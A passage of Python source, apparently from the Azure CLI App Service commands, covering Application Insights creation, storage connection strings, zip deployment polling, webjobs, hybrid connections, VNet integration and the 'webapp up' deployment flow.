creation_failed_warn = 'Unable to create the Application Insights for the Function App. ' \
'Please use the Azure Portal to manually create and configure the Application Insights, ' \
'if needed.'
ai_resource_group_name = functionapp.resource_group
ai_name = functionapp.name
ai_location = functionapp.location
app_insights_client = get_mgmt_service_client(cmd.cli_ctx, ApplicationInsightsManagementClient)
ai_properties = {
"name": ai_name,
"location": ai_location,
"kind": "web",
"properties": {
"Application_Type": "web"
}
}
appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
if appinsights is None or appinsights.instrumentation_key is None:
logger.warning(creation_failed_warn)
return
    # Emit this success message as a warning so it does not interfere with regular JSON output on stdout
logger.warning('Application Insights \"%s\" was created for this Function App. '
'You can visit https://portal.azure.com/#resource%s/overview to view your '
'Application Insights component', appinsights.name, appinsights.id)
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None):
if deployment_source_url:
logger.warning("Linking to git repository '%s'", deployment_source_url)
try:
config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
deployment_source_branch, manual_integration=True)
except Exception as ex: # pylint: disable=broad-except
ex = ex_handler_factory(no_throw=True)(ex)
logger.warning("Link to git repository failed due to error '%s'", ex)
if deployment_local_git:
local_git_info = enable_local_git(cmd, resource_group_name, name)
logger.warning("Local git is configured with url of '%s'", local_git_info['url'])
setattr(webapp, 'deploymentLocalGitUrl', local_git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
sa_resource_group = resource_group_name
if is_valid_resource_id(storage_account):
sa_resource_group = parse_resource_id(storage_account)['resource_group']
storage_account = parse_resource_id(storage_account)['name']
storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
storage_account)
error_message = ''
endpoints = storage_properties.primary_endpoints
sku = storage_properties.sku.name
allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS'] # pylint: disable=line-too-long
for e in ['blob', 'queue', 'table']:
if not getattr(endpoints, e, None):
error_message = "Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e) # pylint: disable=line-too-long
if sku not in allowed_storage_types:
error_message += 'Storage type {} is not allowed'.format(sku)
if error_message:
raise CLIError(error_message)
obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account) # pylint: disable=no-member
try:
keys = [obj.keys[0].value, obj.keys[1].value] # pylint: disable=no-member
except AttributeError:
# Older API versions have a slightly different structure
keys = [obj.key1, obj.key2] # pylint: disable=no-member
endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
"https",
endpoint_suffix,
storage_account,
keys[0]) # pylint: disable=no-member
return connection_string
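# Illustrative sketch (placeholder values, not real credentials): the shape of
# the connection string assembled by _validate_and_get_connection_string above.
def _example_connection_string_shape():
    conn = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        'https', 'core.windows.net', 'mystorageacct', 'placeholder-key')
    assert conn.startswith('DefaultEndpointsProtocol=https;EndpointSuffix=core.windows.net')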
def list_consumption_locations(cmd):
client = web_client_factory(cmd.cli_ctx)
regions = client.list_geo_regions(sku='Dynamic')
return [{'name': x.name.lower().replace(' ', '')} for x in regions]
def list_locations(cmd, sku, linux_workers_enabled=None):
web_client = web_client_factory(cmd.cli_ctx)
full_sku = get_sku_tier(sku)
web_client_geo_regions = web_client.list_geo_regions(sku=full_sku, linux_workers_enabled=linux_workers_enabled)
providers_client = providers_client_factory(cmd.cli_ctx)
providers_client_locations_list = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
for resource_type in providers_client_locations_list:
if resource_type.resource_type == 'sites':
providers_client_locations_list = resource_type.locations
break
return [geo_region for geo_region in web_client_geo_regions if geo_region.name in providers_client_locations_list]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
import requests
from azure.cli.core.util import should_disable_connection_verify
total_trials = (int(timeout) // 2) if timeout else 450
num_trials = 0
while num_trials < total_trials:
time.sleep(2)
response = requests.get(deployment_status_url, headers=authorization,
verify=not should_disable_connection_verify())
try:
res_dict = response.json()
except json.decoder.JSONDecodeError:
logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
res_dict = {}
finally:
num_trials = num_trials + 1
if res_dict.get('status', 0) == 3:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
"-n {} -g {}".format(res_dict, name, rg_name))
if res_dict.get('status', 0) == 4:
break
if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # shown only in verbose/debug mode; customers found this confusing in normal output
# if the deployment is taking longer than expected
if res_dict.get('status', 0) != 4:
_configure_default_logging(cmd, rg_name, name)
raise CLIError("""Timeout reached by the command, however, the deployment operation
is still on-going. Navigate to your scm site to check the deployment status""")
return res_dict
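# Reference sketch of the Kudu deployment status codes that the poller above
# keys on (other values mean the deployment is still in progress). This dict is
# illustrative only and is not consulted by the CLI.
_EXAMPLE_KUDU_DEPLOYMENT_STATUS = {
    3: 'Failed',   # raises CLIError and configures default logging
    4: 'Success',  # breaks out of the polling loop
}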
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
def list_hc(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
listed_vals = client.web_apps.list_hybrid_connections(resource_group_name, name)
else:
listed_vals = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
# reformats hybrid connection, to prune unnecessary fields
mod_list = []
for x in listed_vals.additional_properties["value"]:
properties = x["properties"]
resourceGroup = x["id"].split("/")
mod_hc = {
"id": x["id"],
"location": x["location"],
"name": x["name"],
"properties": {
"hostname": properties["hostname"],
"port": properties["port"],
"relayArmUri": properties["relayArmUri"],
"relayName": properties["relayName"],
"serviceBusNamespace": properties["serviceBusNamespace"],
"serviceBusSuffix": properties["serviceBusSuffix"]
},
"resourceGroup": resourceGroup[4],
"type": x["type"]
}
mod_list.append(mod_hc)
return mod_list
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
hy_co_id = ''
for n in namespace_client.list():
logger.warning(n.name)
if n.name == namespace:
hy_co_id = n.id
if hy_co_id == '':
raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
i = 0
hy_co_resource_group = ''
hy_co_split = hy_co_id.split("/")
for z in hy_co_split:
if z == "resourceGroups":
hy_co_resource_group = hy_co_split[i + 1]
i = i + 1
# calling the relay API to get information about the hybrid connection
hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_info = hy_co.id
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
id_parameters = hy_co_info.split("/")
# populate object with information from the hybrid connection, and set it
# on webapp
hc = HybridConnection(service_bus_namespace=id_parameters[8],
relay_name=hybrid_connection,
relay_arm_uri=hy_co_info,
hostname=hostname,
port=port,
send_key_name="defaultSender",
send_key_value=hy_co_keys.primary_key,
service_bus_suffix=".servicebus.windows.net")
if slot is None:
return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
hybrid_connection, hc)
else:
return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot, hc)
# reformats hybrid connection, to prune unnecessary fields
resourceGroup = return_hc.id.split("/")
mod_hc = {
"hostname": return_hc.hostname,
"id": return_hc.id,
"location": return_hc.additional_properties["location"],
"name": return_hc.name,
"port": return_hc.port,
"relayArmUri": return_hc.relay_arm_uri,
"resourceGroup": resourceGroup[4],
"serviceBusNamespace": return_hc.service_bus_namespace,
"serviceBusSuffix": return_hc.service_bus_suffix
}
return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
HybridConnection = cmd.get_models('HybridConnection')
web_client = web_client_factory(cmd.cli_ctx)
# extract the hybrid connection resource group
asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
arm_uri = asp_hy_co.relay_arm_uri
split_uri = arm_uri.split("resourceGroups/")
resource_group_strings = split_uri[1].split('/')
relay_resource_group = resource_group_strings[0]
hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
# calling the relay function to obtain information about the hc in question
hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
# if the hybrid connection does not have a default sender authorization
# rule, create it
hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
has_default_sender_key = False
for r in hy_co_rules:
if r.name.lower() == "defaultsender":
for z in r.rights:
if z == z.send:
has_default_sender_key = True
if not has_default_sender_key:
rights = [AccessRights.send]
hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
"defaultSender", rights)
hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
for x in hy_co_metadata:
if x["key"] == "endpoint":
hy_co_hostname = x["value"]
hostname_parts = hy_co_hostname.split(":")
hostname = hostname_parts[0]
port = hostname_parts[1]
key = "empty"
if key_type.lower() == "primary":
key = hy_co_keys.primary_key
elif key_type.lower() == "secondary":
key = hy_co_keys.secondary_key
    # ensure the provided key type is valid
if key == "empty":
logger.warning("Key type is invalid - must be primary or secondary")
return
apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
hybrid_connection)
# changes the key for every app that uses that hybrid connection
for x in apps:
app_info = ast.literal_eval(x)
app_name = app_info["name"]
app_id = app_info["id"]
id_split = app_id.split("/")
app_resource_group = id_split[4]
hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
send_key_value=key)
web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
hybrid_connection, hc)
return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
web_client = web_client_factory(cmd.cli_ctx)
return web_client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
linux_webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = linux_webapp.reserved
if is_linux:
return logger.warning("hybrid connections not supported on a linux app.")
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_hc = client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
else:
return_hc = client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
hybrid_connection, slot)
return return_hc
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
result = list(client.web_apps.list_vnet_connections(resource_group_name, name))
else:
result = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
mod_list = []
    # reformats the vnet entry, removing unnecessary information
for x in result:
# removes GUIDs from name and id
longName = x.name
if '_' in longName:
usIndex = longName.index('_')
shortName = longName[usIndex + 1:]
else:
shortName = longName
v_id = x.id
lastSlash = v_id.rindex('/')
shortId = v_id[:lastSlash] + '/' + shortName
# extracts desired fields
certThumbprint = x.cert_thumbprint
location = x.additional_properties["location"]
v_type = x.type
vnet_resource_id = x.vnet_resource_id
id_strings = v_id.split('/')
resourceGroup = id_strings[4]
routes = x.routes
vnet_mod = {"certThumbprint": certThumbprint,
"id": shortId,
"location": location,
"name": shortName,
"resourceGroup": resourceGroup,
"routes": routes,
"type": v_type,
"vnetResourceId": vnet_resource_id}
mod_list.append(vnet_mod)
return mod_list
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
skip_delegation_check=False):
return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot, skip_delegation_check)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot, client=client)
parsed_plan = parse_resource_id(app.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
if skip_delegation_check:
logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
else:
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
app.virtual_network_subnet_id = subnet_info["subnet_resource_id"]
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot,
client=client, extra_parameter=app)
# Enable Route All configuration
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.vnet_route_all_enabled is not True:
config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
return {
"id": subnet_info["vnet_resource_id"],
"location": plan_info.location, # must be the same as vnet location bc of validation check
"name": subnet_info["vnet_name"],
"resourceGroup": subnet_info["resource_group_name"],
"subnetResourceId": subnet_info["subnet_resource_id"]
}
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
from azure.cli.core.commands.client_factory import get_subscription_id
Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
vnet_client = network_client_factory(cmd.cli_ctx)
if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
' Missing delegation can cause "Bad Request" error.')
logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
'--resource-group %s '
'--name %s '
'--vnet-name %s '
'--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
else:
subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
delegations = subnetObj.delegations
delegated = False
for d in delegations:
if d.service_name.lower() == "microsoft.web/serverfarms".lower():
delegated = True
if not delegated:
subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
subnet_parameters=subnetObj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
subnet_is_id = is_valid_resource_id(subnet)
if subnet_is_id:
subnet_id_parts = parse_resource_id(subnet)
vnet_name = subnet_id_parts['name']
if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
logger.warning('Subnet ID is valid. Ignoring vNet input.')
return subnet
vnet_is_id = is_valid_resource_id(vnet)
if vnet_is_id:
vnet_id_parts = parse_resource_id(vnet)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
# Reuse logic from existing command to stay backwards compatible
vnet_client = network_client_factory(cli_ctx)
list_all_vnets = vnet_client.virtual_networks.list_all()
vnets = []
for v in list_all_vnets:
if vnet in (v.name, v.id):
vnet_details = parse_resource_id(v.id)
vnet_resource_group = vnet_details['resource_group']
vnets.append((v.id, v.name, vnet_resource_group))
if not vnets:
return logger.warning("The virtual network %s was not found in the subscription.", vnet)
    # If more than one vnet is found, prefer one in the same resource group; otherwise use the first and log its resource id
found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
if not found_vnet:
found_vnet = [vnets[0]]
(vnet_id, vnet, vnet_resource_group) = found_vnet[0]
if len(vnets) > 1:
logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
"To use a different virtual network, specify the virtual network resource ID using --vnet.",
vnet, vnet_id)
vnet_id_parts = parse_resource_id(vnet_id)
return resource_id(
subscription=vnet_id_parts['subscription'],
resource_group=vnet_id_parts['resource_group'],
namespace='Microsoft.Network',
type='virtualNetworks',
name=vnet_id_parts['name'],
child_type_1='subnets',
child_name_1=subnet)
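# Illustrative sketch: the subnet resource ID shape that _validate_subnet above
# assembles via resource_id() (all names below are placeholders).
def _example_subnet_resource_id():
    sub, rg, vnet, subnet = '00000000-0000-0000-0000-000000000000', 'my-rg', 'my-vnet', 'my-subnet'
    expected = ('/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/'
                'virtualNetworks/{}/subnets/{}'.format(sub, rg, vnet, subnet))
    assert expected.endswith('/subnets/my-subnet')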
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return_vnet = client.web_apps.delete_swift_virtual_network(resource_group_name, name)
else:
return_vnet = client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
return return_vnet
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None, # pylint: disable=too-many-statements,too-many-branches
os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
app_service_environment=None):
if not name:
name = generate_default_app_name(cmd)
import os
AppServicePlan = cmd.get_models('AppServicePlan')
src_dir = os.getcwd()
_src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
client = web_client_factory(cmd.cli_ctx)
user = get_profile_username()
_create_new_rg = False
_site_availability = get_site_availability(cmd, name)
_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_tier(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we always call the ASP create-or-update API so that, on re-deployment, any
    # updated SKU or plan settings are applied
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
    else:  # for an existing app, we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
            # may need to update stack runtime settings. For node it's site_config.app_settings; otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
                    settings.append('%s=%s' % (k, v))
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
    # the portal uses this current_stack value to display the correct runtime for Windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
